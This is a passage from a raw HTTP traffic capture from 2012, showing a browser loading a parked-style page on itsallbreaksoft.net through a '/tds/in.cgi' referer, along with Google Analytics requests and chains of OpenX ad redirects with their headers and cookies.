Cust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8 HTTP/1.1

Host: itsallbreaksoft.net
GET /css/style.css?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=101604&amp;def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: SessionID=706eac1f-f1fa-478e-90ea-1a1bcd222474; VisitorID=ebe7e48f-2c1c-4716-a346-61310a5e44cb&amp;Exp=11/16/2015 12:24:44 PM
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 16 Nov 2012 20:24:45 GMT
Content-Length: 3668
GET /images/Themes/T101/bullets/0006.gif HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/css/style.css?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=101604&amp;def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 376
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=67250
Date: Fri, 16 Nov 2012 20:24:43 GMT
Connection: keep-alive
GET /images/Themes/T101/buttons/0006.gif HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/css/style.css?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=101604&amp;def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 894
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=67250
Date: Fri, 16 Nov 2012 20:24:43 GMT
Connection: keep-alive
GET /sd?s=124463&f=1&C=1 HTTP/1.1

Host: as.casalemedia.com
GET /sd?s=124463&amp;f=1&amp;C=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: CMID=jtS1x0PS1I0AAFzn4NQAAABh; CMPS=134; CMPP=008
HTTP/1.1 200 OK

Content-Type: text/plain
Server: Apache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Content-Length: 0
Expires: Fri, 16 Nov 2012 20:24:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 16 Nov 2012 20:24:43 GMT
Connection: keep-alive
Set-Cookie: CMID=jtS1x0PS1I0AAFzn4NQAAABh;domain=casalemedia.com;path=/;expires=Sat, 16 Nov 2013 20:24:43 GMT CMPS=134;domain=casalemedia.com;path=/;expires=Thu, 14 Feb 2013 20:24:43 GMT CMPP=008;domain=casalemedia.com;path=/;expires=Thu, 14 Feb 2013 20:24:43 GMT CMST=UKahC1CmoQsB;domain=casalemedia.com;path=/;expires=Sat, 17 Nov 2012 20:24:43 GMT CMSC=UKahCw**;domain=casalemedia.com;path=/; CMDD=AAHmKAE*;domain=casalemedia.com;path=/;expires=Sat, 17 Nov 2012 20:24:43 GMT
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14948
Content-Encoding: gzip
Last-Modified: Wed, 07 Nov 2012 22:33:51 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Fri, 16 Nov 2012 11:57:54 GMT
Expires: Fri, 16 Nov 2012 23:57:54 GMT
Vary: Accept-Encoding
Cache-Control: max-age=43200, public
Age: 30409
Server: GFE/2.0
GET /89c641f8-d669-4c81-aadf-2ba709fac00a.ippi?g=89c641f8-d669-4c81-aadf-2ba709fac00a HTTP/1.1

Host: itsallbreaksoft.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: SessionID=706eac1f-f1fa-478e-90ea-1a1bcd222474; VisitorID=ebe7e48f-2c1c-4716-a346-61310a5e44cb&amp;Exp=11/16/2015 12:24:44 PM
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 16 Nov 2012 20:24:45 GMT
GET /__utm.gif?utmwv=5.3.8&utms=1&utmn=152243605&utmhn=itsallbreaksoft.net&utmcs=UTF-8&utmsr=1176x885&utmvp=1x1&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Itsallbreaksoft.net&utmhid=438890679&utmr=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&utmp=%2Ftds%2Fin.cgi%3F3%26seoref%3D%26parameter%3D%24keyword%26se%3D%24se%26ur%3D1%26HTTP_REFERER%3Dhttp%25253A%25252F%25252Fwww.meridiancrest.com%25252Fgoogle-hot-trends-on-usa-election-day-2008%25252F%26default_keyword%3Dnotdefine&utmac=UA-2249740-15&utmcc=__utma%3D150301038.1455723788.1353097483.1353097483.1353097483.1%3B%2B__utmz%3D150301038.1353097483.1.1.utmcsr%3Dmeridiancrest.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fgoogle-hot-trends-on-usa-election-day-2008%2F%3B&utmu=H~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=1&amp;utmn=152243605&amp;utmhn=itsallbreaksoft.net&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1x1&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Itsallbreaksoft.net&amp;utmhid=438890679&amp;utmr=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;utmp=%2Ftds%2Fin.cgi%3F3%26seoref%3D%26parameter%3D%24keyword%26se%3D%24se%26ur%3D1%26HTTP_REFERER%3Dhttp%25253A%25252F%25252Fwww.meridiancrest.com%25252Fgoogle-hot-trends-on-usa-election-day-2008%25252F%26default_keyword%3Dnotdefine&amp;utmac=UA-2249740-15&amp;utmcc=__utma%3D150301038.1455723788.1353097483.1353097483.1353097483.1%3B%2B__utmz%3D150301038.1353097483.1.1.utmcsr%3Dmeridiancrest.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fgoogle-hot-trends-on-usa-election-day-2008%2F%3B&amp;utmu=H~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:57:54 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 30409
Server: GFE/2.0
GET /w/1.0/afr?auid=309042&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=e57695b2-0aee-0b77-1aa7-24afdd140bc9_a_1353097482; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?cc=1&amp;auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?auid=309047&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=c5562cb3-ae1d-0f25-10ac-10aa7e583028_a_1353097482; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?auid=309045 HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=b45c1f3f-242d-0f2a-27d9-17bf675392e6_a_1353097482; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?cc=1&amp;auid=309045
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?auid=309041 HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=a8a10a64-532b-029f-0620-cbca49c32c1a_a_1353097482; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?cc=1&amp;auid=309041
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?cc=1&auid=309042&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?cc=1&amp;auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=e57695b2-0aee-0b77-1aa7-24afdd140bc9_a_1353097482
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=e57695b2-0aee-0b77-1aa7-24afdd140bc9_a_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309042%26cb%3DINSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?cc=1&auid=309047&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=c5562cb3-ae1d-0f25-10ac-10aa7e583028_a_1353097482
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=c5562cb3-ae1d-0f25-10ac-10aa7e583028_a_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309047%26cb%3DINSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309042%26cb%3DINSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: u.openx.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://u.openx.net/w/1.0/sc?cc=1&amp;r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309042%26cb%3DINSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309047%26cb%3DINSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: u.openx.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
